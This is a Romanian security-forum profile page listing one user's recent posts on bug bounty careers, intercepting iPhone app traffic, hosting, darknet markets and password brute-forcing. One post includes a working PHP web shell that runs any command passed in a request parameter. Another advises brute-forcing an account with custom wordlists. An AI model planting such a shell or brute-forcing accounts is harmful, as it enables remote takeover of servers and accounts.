Jump to content

0xStrait

Active Members
  • Posts

    170
  • Joined

  • Last visited

  • Days Won

    3

0xStrait last won the day on February 13

0xStrait had the most liked content!

Reputation

72 Excellent

1 Follower

About 0xStrait

  • Rank
    Registered user
    Newbie
  • Birthday 05/11/1970

Recent Profile Visitors

2829 profile views
  1. Cum ai procedat tu defapt, ai setat proxy pe iPhone si ai analizat request-urile http/https prin Fiddler? Alte request-uri vezi? Posibil sa nu fi configurat tu bine "setup-ul". Lasa un screen cu request-urile, sunt curios. Daca chiar ai timp si vrei sa rezolvi problema, poti incerca Jailbreak pe iPhone apoi creezi un sistem WLAN cu o antena, si poti redirectiona tot traficul de pe 80/443 pe alt port (IP Masquerade), poti capta request-urile in burpsuite. Poti trece de SSL cu Frida sau instalezi asta direct pe iPhone, a doua varianta am testat-o recent si functioneaza pe iOS 13.4.1. Poti incerca si Wireshark, probabil aplicatia se foloseste de alt protocol pentru reclame.
  2. Rog cei care au posibilitate sa "imortalizeze" conferinta si sa uploadeze pe o platforma de streaming, din pacate nu o sa pot sa fiu prezent
  3. Interesant! Am creeat si eu un tool asemanator, dar mai complex. Cei care practicati BB sau sunteti interesati si aveti idei noi putem sa automatizam tot procesul de recon. Ca sa incurajam tinerii il vom face public. Cine este interesat?
  4. Ti-as recomanda sa iti iei un job part-time (25 ore/sapt) si asa o sa ai timp de BB, e cam riscant sa incepi direct full-time BB si sa lucrezi sub presiune ca sa-ti faci banii de "supravietuire". In acelasi timp iti recomand sa-ti faci si un blog si sa incepi sa scri despre vuln pe care le vei gasi, in modul asta chiar daca nu faci foarte multi bani din BB, o sa te abordeze o companie mica/mare. Cel putin metoda asta a functionat la mine Succes!
  5. Nope, port scanning nu e out of scope. ("Out of scope" e termenul folosit domeniilor pentru care nu primesti recompensa sau domenilor pe care nu ai voie sa faci teste, in unele cazuri poti raporta vulnerabilitati si acolo ca sa faci rep, dar nu vei primi reward) Te poti folosi de orice in BB, poti raporta chiar si 0day dar regula ca sa primesti reward este sa treaca 30 zile de la publicarea 0day-ului sau in cazul in care tu gasesti un 0day poti sa-l raportezi mai multor site-uri care au program BB dupa care sa-l faci public. Sau sa nu te complici cu BB si sa-l vinzi pe zerodium. @aelius, mi se pare foarte tare sa-ti faci contractele singur si sa lucrezi de acasa. Dar cum faci asta? Este vre-o platforma gen freelancer pt. cyber sec?
  6. Cum zice Nytro, daca faci BB nu e nevoie de VPN. Apropo, ia-ti server de la Digitalocean nu o sa ai probleme cu port scanning / content-discovery / bruteforce. Daca esti interesat, lasa-mi pm o sa-ti dau link-ul meu de referral si primesti $50 ,eu la randul meu o sa primesc $20 credit, daca tin bine minte. Succes!
  7. E tare tipul, a luat vreo $30k. Asta a luat $70k de la Yahoo si mai e un indian care a luat $100k de la Apple pentru account takeover. Toate vulnerabilitatiile fiind WEB APP.
  8. Ce e 404 hidden shell? Daca e cum zici tu lasa link-ul complet cu parametrul. Aia e pagina default de la apache...
  9. Digitalocean lafel 100% uptime aproximativ 2 ani, tin pe el un wordpress si il folosesc la teste uneori. Bine... pretul difera.
  10. Mi se pare super ideea, daca s-ar potrivi timpul incat sa fiu liber, mi-ar placea sa particip la un CTF. Ca si platforme pt. conferinta se pot folosii Microsoft Team, BlueJeans sau cel mai rau caz Skype (toate platformele mentionate le-am intalnit in timpul interviurilor si au fost OK). Ca si idee de subiect ar fi: "Metodologia unui pentester roman" zic roman pentru ca sunt curios cum abordeaza un roman situatia, fiecare nationalitate are un anume stil, de ex: indienii se focuseaza mai multe pe partea de bruteforce tot ce tine legat de (asset discovery, auth bypass, token, etc), americanii aleg partea logica, chinezii sunt deep source. Pe mine ma omoara curiozitatea, cum este ziua unu pentester / security analyst / security engineer? Care este metodologia care o aplici pentru gasirea vulnerabilitatiilor in aplicatii WEB? De ce te folosesti? Se merita investitia in Shodan de exemplu? Cat de mult folosesti "self tool scripting"? De ce burpsuite si nu ZAP? Poate gasiti vre-un 0day intre timp si-l faceti public :)))
  11. @makav3li mane daca ai inceput discutia du-o pana la capat, care-s forum-urile alea unde se gasesc exploit-uri si chestii private care tin de securitate si nu se gasesc pe motoarele de cautare care indexeaza? Stiu doua printre cele mai mari care au fost inchise de catre FBI, dark0de si omerta, pe ambele se vindeau dr*gs si nu se faceau livrari doar in tarile mai permisive (USA, Olanda, UK, Germania si probabil alte tari nordice), conturi de diferite platforme si medicamente care in mod normal aveai nevoie de reteta, in nici-un caz asasinari, p0rn0grafie si cacaturi cum zic toti ^vlogerii. Oricum cred ca la un research mai amanuntit se poate afla unde au migrat toti membri site-urilor mentionate mai sus, sti cum e, dispare unu apar 3.
  12. 0xStrait

    Atac flood

    @Bunicu2 urca un fisier /test.txt cu mesajul rstforums.com sa ne demonstrezi ca e forum-ul tau si daca am timp iti fac un test... dar pariez ca pica la chestii simple cum ar fi o lista de proxy-uri care acceseaza simulat forum-ul // sau urca test.php si lasa link =)))) <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
  13. Descarca asta sau incearca o alta alternativa care face acelasi lucru (bruteforce), mai ai nevoie de un wordlist. Ca sa cresti sansele de succes, trebuie sa analizezi indiciile (daca ai), sa cauti / creezi un wordlist custom in functie de limba, tipologie, hobbies and shit. Oricum nu e garantat 100% ca o sa reusesti. Succes! // Sper ca asta nu se catalogeaza ca idei de frauda, e pur educational. E nevoie de chestia aia cu "pe propria raspundere" ?
  14. © 2017 All Rights Reserved Terms of Use Privacy Policy No-Spam Policy wtf?
  15. De ce sa te complici cu asta? Ce sa mai faca vedetele care au 100k conturi false? Totul depinde de inteligenta oamenilor care o inconjoara pe sora ta, daca ei sunt atat de slab pregatiti incat sa nu recunoasca un cont fals, atunci sorry. Legea atractiei -> daca acorzi atentie chestiilor de genul asta, asta o sa atragi. Pur si simplu trebuie ignorat totul, daca te complici cu declaratii si dosare, la cum se misca lucrurile in ro o sa ai batai si mai mari de cap. Succes!
×
×
  • Create New...